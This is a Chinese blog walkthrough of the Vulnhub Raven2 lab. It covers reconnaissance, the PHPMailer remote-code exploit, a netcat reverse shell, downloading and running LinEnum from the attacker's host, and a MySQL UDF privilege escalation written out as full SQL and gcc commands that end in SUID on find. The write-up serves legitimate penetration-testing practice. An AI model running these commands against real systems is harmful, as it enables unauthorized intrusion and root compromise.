首页 > 其他分享 >Raven2

Raven2

时间:2024-01-17 20:33:53浏览次数:25  
标签:www 192.168 icepeak so mysql Raven2 foo

扫描IP 
扫描服务

image-20240115103113128

进入网站收集信息
dirsearch -u "192.168.218.137"

image-20240115203044170

挨个进入查看
http://192.168.218.137/vendor/PATH
找到flag1

image-20240115203557355

搜集信息
php
版本号
邮件网站

image-20240115220724835

image-20240115203644256

image-20240115203653766

CMS为wordpress
使用wpscan扫描
没搜集到

image-20240115205741106

进入msf
search phpmailer

image-20240115220913255

use 0
show options
set 变量

image-20240115221033151

这种方法没成功
使用
searchsploit PHPMailer
cp /usr/share/exploitdb/exploits/php/webapps/40974.py /root/桌面/run
设置变量
vi 
:wq保存
python 运行

image-20240115225253324

image-20240116150042377

再使用nc -lvvp 4444 监听
火狐访问木马后门位置

image-20240115225655915

反弹shell
python -c 'import pty; pty.spawn("/bin/bash")'

image-20240115225740185

find / -name flag*
查找flag

image-20240115225830612

/var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png
/var/www/flag2.txt
cat /var/www/flag2.txt
访问网站看到png的flag

image-20240115230012845

image-20240115230025439

下面用到工具LinEnum(Linux枚举及权限提升检查工具)
开启网站服务
靶机下载wget http://192.168.218.129:8080/LinEnum.sh
添加权限chmod +x LinEnum.sh
./LinEnum.sh 运行
翻看查到mysql的root权限

image-20240115230335734

image-20240115230406753

image-20240115231015529

进入登录页面查找数据库账号密码
cat /var/www/html/wordpress/wp-config.php
进入mysql后再进行信息搜集

image-20240115231639886

image-20240115231611395

因为mysql版本>=5.1,所以必须把 UDF 的动态链接库.so文件放置于 MySQL 安装目录下的 lib\plugin 文件夹下文件夹下才能创建自定义函数。
show variables like '%plugin%';

image-20240115231853040

searchsploit udf 搜索漏洞
cp /usr/share/exploitdb/exploits/linux/local/1518.c /root/桌面/run/ 
gcc -g -c 1518.c 
gcc -g -shared -o icepeak.so 1518.o -lc
-g 生成调试信息
-c 编译(二进制)
-shared:创建一个动态链接库,输入文件可以是源文件、汇编文件或者目标文件。
-o:执行命令后的文件名
-lc:-l 库 c库名

image-20240115232232801

靶机下载编译过的文件wget http://192.168.218.129:8081/icepeak.so
mysql -uroot -pR@v3nSecurity 继续登录
use mysql; #进入数据库
create table foo(line blob); #创建数据表foo
insert into foo values(load_file('/tmp/icepeak.so')); #插入数据
select * from foo into dumpfile '/usr/lib/mysql/plugin/icepeak.so'; #( Foo表成功插入二进制数据,然后利用dumpfile函数把文件导出outfile 多行导出,dumpfile一行导出outfile会有特殊的转换,而dumpfile是原数据导新建存储函数)
create function do_system returns integer soname 'icepeak.so'; #(创建自定义函数do_system 类型是integer,别名soname文件名字然后查询函数是否创建成功)
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find'); #(调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令)
quit
whoami
结束

标签:www,192.168,icepeak,so,mysql,Raven2,foo
From: https://www.cnblogs.com/yang-ace/p/17971056

相关文章

  • vulnhub-Raven2
    搜集信息kaliip:192.168.56.109/24发现目标:nmap-sn192.168.56.109/24或nmap-sP192.168.56.109/24靶机ip:192.168.56.114扫描端口nmap-A-p-192.168.56.114No......